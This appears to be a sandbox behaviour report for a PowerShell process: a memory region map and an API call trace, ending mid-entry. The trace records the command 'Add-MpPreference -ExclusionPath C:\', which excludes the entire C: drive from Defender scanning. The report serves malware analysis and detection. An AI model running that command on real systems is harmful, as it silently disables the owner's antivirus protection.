0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1894 start_va = 0xe20000 end_va = 0xe90fff monitored = 0 entry_point = 0xe29c00 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe") Region: id = 1895 start_va = 0xea0000 end_va = 0x4e9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 1896 start_va = 0x77760000 end_va = 0x778dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1897 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1898 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1899 start_va = 0x7fff0000 end_va = 0x7df85d0cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1900 start_va = 0x7df85d0d0000 end_va = 0x7ff85d0cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df85d0d0000" filename = "" Region: id = 1901 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1902 start_va = 0x7ff85d291000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff85d291000" filename = "" Region: id = 1917 start_va = 0x190000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1918 start_va = 0x68240000 end_va = 0x6828ffff monitored = 0 entry_point = 0x68258180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1919 start_va = 0x682a0000 end_va = 0x68319fff monitored = 0 entry_point = 0x682b3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1920 start_va = 0x74c90000 end_va = 0x74d6ffff monitored = 0 entry_point = 0x74ca3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1921 start_va = 0x68290000 end_va = 0x68297fff monitored = 0 entry_point = 0x682917c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1938 start_va = 0x400000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1939 start_va = 0x74c90000 end_va = 0x74d6ffff monitored = 0 entry_point = 0x74ca3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1940 start_va = 0x75ac0000 end_va = 0x75c3dfff monitored = 0 entry_point = 0x75b71b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1941 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1942 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2065 start_va = 0x5b0000 end_va = 0x66dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2066 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2067 start_va = 0x75830000 end_va = 0x758aafff monitored = 0 entry_point = 0x7584e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2068 start_va = 0x74570000 end_va = 0x7462dfff monitored = 0 entry_point = 0x745a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2069 start_va = 0x110000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 2070 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2071 start_va = 0x75680000 end_va = 0x756c3fff monitored = 0 entry_point = 0x75699d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2072 start_va = 0x753a0000 end_va = 0x7544cfff monitored = 0 entry_point = 0x753b4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2073 start_va = 0x74490000 end_va = 0x744adfff monitored = 0 entry_point = 0x7449b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2074 start_va = 0x74480000 end_va = 0x74489fff monitored = 0 entry_point = 0x74482a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2075 start_va = 0x75580000 end_va = 0x755d7fff monitored = 0 entry_point = 0x755c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2076 start_va = 0x77660000 end_va = 0x7774afff monitored = 0 entry_point = 0x7769d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2077 start_va = 0x77480000 end_va = 0x7763cfff monitored = 0 entry_point = 0x77562a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2078 start_va = 0x71f20000 end_va = 0x71f37fff monitored = 0 entry_point = 0x71f24820 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 2079 start_va = 0x749b0000 end_va = 0x74afefff monitored = 0 entry_point = 0x74a66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2080 start_va = 0x756d0000 end_va = 0x75816fff monitored = 0 entry_point = 0x756e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2081 start_va = 0x755e0000 end_va = 0x75671fff monitored = 0 entry_point = 0x75618cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2082 start_va = 0x670000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 2083 start_va = 0x71ec0000 end_va = 0x71f18fff monitored = 1 entry_point = 0x71ed0780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 2084 start_va = 0x1a0000 end_va = 0x1c9fff monitored = 0 entry_point = 0x1a5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2085 start_va = 0x740000 end_va = 0x8c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 2086 start_va = 0x75c40000 end_va = 0x75c6afff monitored = 0 entry_point = 0x75c45680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2087 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2088 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2089 start_va = 0x1b0000 end_va = 0x1b2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 2090 start_va = 0x8d0000 end_va = 0xa50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 2091 start_va = 0x4ea0000 end_va = 0x629ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ea0000" filename = "" Region: id = 2092 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2093 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2094 start_va = 0xa60000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 2095 start_va = 0x71e40000 end_va = 0x71eb8fff monitored = 1 entry_point = 0x71e4f82a region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 2096 start_va = 0x74860000 end_va = 0x748a4fff monitored = 0 entry_point = 0x7487de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2097 start_va = 0x75510000 end_va = 0x7551bfff monitored = 0 entry_point = 0x75513930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2098 start_va = 0x71e30000 end_va = 0x71e37fff monitored = 0 entry_point = 0x71e317b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2099 start_va = 0x71770000 end_va = 0x71e20fff monitored = 1 entry_point = 0x71785d20 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 2100 start_va = 0x71670000 end_va = 0x71764fff monitored = 0 entry_point = 0x716c4160 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\SysWOW64\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll") Region: id = 2101 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2102 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2103 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2104 start_va = 0x4b0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2105 start_va = 0x410000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 2106 start_va = 0x420000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 2107 start_va = 0x430000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 2108 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2109 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 2110 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 2111 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 2112 start_va = 0xa60000 end_va = 0xbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 2113 start_va = 0xc20000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 2114 start_va = 0x670000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 2115 start_va = 0x6b0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 2116 start_va = 0x730000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 2117 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2118 start_va = 0x62a0000 end_va = 0x829ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062a0000" filename = "" Region: id = 2119 start_va = 0x480000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2120 start_va = 0x6f0000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 2121 start_va = 0xa60000 end_va = 0xa9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 2122 start_va = 0xbb0000 end_va = 0xbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 2123 start_va = 0x82a0000 end_va = 0x85d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2127 start_va = 0x70440000 end_va = 0x71667fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll") Region: id = 2173 start_va = 0xc30000 end_va = 0xddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 2174 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 2175 start_va = 0x6f830000 end_va = 0x701dbfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\cc4e5d110dd318e8b7d61a9ed184ab74\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\cc4e5d110dd318e8b7d61a9ed184ab74\\system.ni.dll") Region: id = 2176 start_va = 0x6f110000 end_va = 0x6f821fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\abad45b9cc652ba7e38c4c837234c0ab\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\abad45b9cc652ba7e38c4c837234c0ab\\system.core.ni.dll") Region: id = 2177 start_va = 0x6f080000 end_va = 0x6f10afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Pb378ec07#\\24c2ce3e0888a5f9c613c20443ec3711\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.pb378ec07#\\24c2ce3e0888a5f9c613c20443ec3711\\microsoft.powershell.consolehost.ni.dll") Region: id = 2178 start_va = 0x6f060000 end_va = 0x6f072fff monitored = 0 entry_point = 0x6f069950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2179 start_va = 0x6f030000 end_va = 0x6f05efff monitored = 0 entry_point = 0x6f0495e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2180 start_va = 0x74130000 end_va = 0x7414afff monitored = 0 entry_point = 0x74139050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2391 start_va = 0x6d780000 end_va = 0x6f02dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Manaa57fc8cc#\\1ccb63704392d146fb118a3c7c02e118\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.manaa57fc8cc#\\1ccb63704392d146fb118a3c7c02e118\\system.management.automation.ni.dll") Region: id = 3110 start_va = 0xaa0000 end_va = 0xadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 3111 start_va = 0xae0000 end_va = 0xb1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 3112 start_va = 0xb20000 end_va = 0xb81fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll") Region: id = 3117 start_va = 0xb90000 end_va = 0xb94fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 3118 start_va = 0xba0000 end_va = 0xbaffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 3121 start_va = 0x75820000 end_va = 0x75825fff monitored = 0 entry_point = 0x75821460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 3131 start_va = 0xc30000 end_va = 0xd2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 3132 start_va = 0xdd0000 end_va = 0xddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 3218 start_va = 0x6d570000 end_va = 0x6d5b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.numerics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Numerics\\4d1e79f86c195a48bfb3d1e5ca404930\\System.Numerics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.numerics\\4d1e79f86c195a48bfb3d1e5ca404930\\system.numerics.ni.dll") Region: id = 3219 start_va = 0xbc0000 end_va = 0xbcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 3270 start_va = 0x6d4f0000 end_va = 0x6d569fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.management.infrastructure.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Mf49f6405#\\c5cf09a01c434d73a149336798330955\\Microsoft.Management.Infrastructure.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.mf49f6405#\\c5cf09a01c434d73a149336798330955\\microsoft.management.infrastructure.ni.dll") Region: id = 3278 start_va = 0x6cdb0000 end_va = 0x6d4c5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\1f87b5140145c221b5201351fffc52d8\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\1f87b5140145c221b5201351fffc52d8\\system.xml.ni.dll") Region: id = 3279 start_va = 0xbd0000 end_va = 0xbdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 3282 start_va = 0x6cc90000 end_va = 0x6cdabfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Dired13b18a9#\\495b4726107659a7a7f716d2b34703ce\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.dired13b18a9#\\495b4726107659a7a7f716d2b34703ce\\system.directoryservices.ni.dll") Region: id = 3286 start_va = 0x6cb70000 end_va = 0x6cc8bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\d2f554a0c84513cd793fdcd77a86dab1\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\d2f554a0c84513cd793fdcd77a86dab1\\system.management.ni.dll") Region: id = 3287 start_va = 0xbe0000 end_va = 0xbeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 3289 start_va = 0xbf0000 end_va = 0xbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 3295 start_va = 0xc00000 end_va = 0xc0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 3297 start_va = 0xc10000 end_va = 0xc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 3300 start_va = 0xd30000 end_va = 0xd3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 3349 start_va = 0xd40000 end_va = 0xd4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 3376 start_va = 0xd50000 end_va = 0xd5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 4976 start_va = 0xd60000 end_va = 0xd6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Thread: id = 60 os_tid = 0xfb4 [0295.973] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0295.977] RoInitialize () returned 0x1 [0295.977] RoUninitialize () returned 0x0 [0296.420] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0296.422] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0297.749] SysStringByteLen (bstr="Add-MpPreference") returned 0x20 [0297.749] SysStringByteLen (bstr="Add-MpPreference") returned 0x20 [0297.749] SysStringByteLen (bstr="-ExclusionPath") returned 0x1c [0297.749] SysStringByteLen (bstr="-ExclusionPath") returned 0x1c [0297.749] SysStringByteLen (bstr="C:\\") returned 0x6 [0297.749] SysStringByteLen (bstr="C:\\") returned 0x6 [0300.682] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0xdec90*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0xdec90*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0300.759] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0xdec90*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0xdec90*(Data1=0x89fad99c, Data2=0x6dce, Data3=0x0, Data4=([0]=0x80, [1]=0xda, [2]=0xfa, [3]=0x89, [4]=0xce, [5]=0x6d, [6]=0xd8, [7]=0x1))) returned 0x0 [0300.762] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0xdec40*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0xdec40*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0301.577] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0xdeca0*(Data1=0x89fad99c, Data2=0x6dce, Data3=0x0, Data4=([0]=0x80, [1]=0xda, [2]=0xfa, [3]=0x89, [4]=0xce, [5]=0x6d, [6]=0xd8, [7]=0x1)) | out: ActivityId=0xdeca0*(Data1=0x89fad99c, Data2=0x6dce, Data3=0x0, Data4=([0]=0x80, [1]=0xda, [2]=0xfa, [3]=0x89, [4]=0xce, [5]=0x6d, [6]=0xd8, [7]=0x1))) returned 0x0 [0301.584] EtwEventRegister (in: ProviderId=0x62a40ec, EnableCallback=0xdd2766, CallbackContext=0x0, RegHandle=0x62a40c4 | out: RegHandle=0x62a40c4) returned 0x0 [0301.598] EtwEventRegister (in: ProviderId=0x62a4dc0, EnableCallback=0xdd278e, CallbackContext=0x0, RegHandle=0x62a4d9c | out: RegHandle=0x62a4d9c) returned 0x0 [0301.605] EtwEventSetInformation (RegHandle=0x5143c8, InformationClass=0x23, EventInformation=0x2, InformationLength=0x62a4cf8) returned 0x0 [0301.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0xdd73c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0301.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xddbd0) returned 1 [0301.623] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0xddc4c | out: lpFileInformation=0xddc4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0301.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xddbcc) returned 1 [0305.191] EtwEventWriteTransfer (RegHandle=0x513fb8, EventDescriptor=0x22, ActivityId=0xdecc8, RelatedActivityId=0xdec60, UserDataCount=0x0, UserData=0x0) returned 0x0 [0305.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xde6c0, lpFilePart=0x0 | out: 